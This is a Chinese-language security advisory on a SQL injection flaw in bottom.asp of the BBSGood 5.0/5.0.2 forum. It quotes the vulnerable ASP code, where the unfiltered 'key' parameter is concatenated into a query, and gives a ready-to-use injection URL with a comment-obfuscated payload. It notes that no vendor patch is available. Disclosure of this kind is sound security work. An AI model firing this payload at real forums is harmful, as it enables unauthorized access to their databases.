BBSGood论坛程序bottom.asp页面SQL注入漏洞
影响版本:
BBSGood 5.0/5.0.2
程序介绍:
BBSGOOD是国内首创使用缓存技术的论坛,BBSGOOD的帖子和列表首页是可以生成静态HTML文件的。
漏洞分析:
在文件bottom.asp中:
key=trim(Request("key")) //第25行
key2=key
key3=key
select case mode
case 1
if instr(1,key," ")>0 then
str=Split(key," ")
key=""
key3=""
For ii=0 to UBound(str)
key=key+"Subject LIKE '%"&str(ii)&"%' and "
key3=key3+""&str(ii)&" - "
Next
key=left(key,len(key)-4)
key3=left(key3,len(key3)-2)
else
key="Subject LIKE '%"&key&"%'"
……
select case mode //第128行
case 1
If DataType=1 Then
sql="select "&Top&" ID,BoardID,Ftbq,TitleColor,Subject,PostUser,PostTime,RePostNum,Hits,LastPostTime,LastPostUser,IsTop,IsBest,CreateHtml,FileName,Admin,IsDel,BoldFace,Pollzt,CommTrue,postsh,upfiletype from LxTel_Topic where "&key&" and IsDel=0 and postsh=0 "&BoardIDStr&" order by id desc"
变量key没有经过任何过滤放入sql语句导致注入漏洞的产生。
漏洞利用:
http://www.syue.com/bottom.asp?mode=1&key=a'/**/and/**/user>0--
解决方案:
厂商补丁:
BBSGood.Speed
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.bbsgood.com/